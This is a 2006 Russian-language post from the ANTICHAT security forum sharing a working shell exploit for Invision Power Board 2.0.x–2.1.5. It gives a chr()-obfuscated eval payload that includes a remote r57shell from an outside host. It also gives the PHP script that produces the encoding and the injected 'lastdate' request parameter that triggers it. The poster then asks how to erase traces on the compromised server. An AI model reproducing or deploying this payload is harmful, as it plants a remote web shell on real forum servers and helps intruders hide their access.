HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Вопросик по шеллу
  #1  
Старый 08.07.2006, 14:49
Sulf aka Joker
Участник форума
Регистрация: 03.07.2006
Сообщений: 110
С нами: 10450174

Репутация: 27
По умолчанию Вопросик по шеллу

Вот шелл для ипб 2.0.х - 2.1.5.

Код:
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //
Значиццо выглядит это так :

Код:
<?php  $str="include \"http://rst.void.ru/download/r57shell.txt\";/*";// */  echo "eval( ";  for($i=0;$i<strlen($str);$i++)  {  	echo "chr(".ord($str[$i])."). ";  }  echo "chr(".ord(" ").") ); //";  ?>
Тут созревает вопрос : шелл заливается через создание темы, поиск темы, и добавки кода вызова шелла :

Код:
&lastdate=z|eval.*?%20//)%23e%00
Тоесть, если я сменю состав сообщения, вместо кода я впишу 123 и код вытру - то шелл не будет присутствовать не серве, тем самым следы можно замести? Я так понимаю хак работает через внешний шелл и не подгружает его в сам форум.
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ОТВЕТЬТЕ please! НА ВОПРОСИК... Болталка 13 15.08.2009 15:09
Вопросик ! z0liCh Болталка 9 07.11.2005 15:59
Небольшой вопросик... Ipb -SX- Уязвимости CMS / форумов 6 17.10.2005 13:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.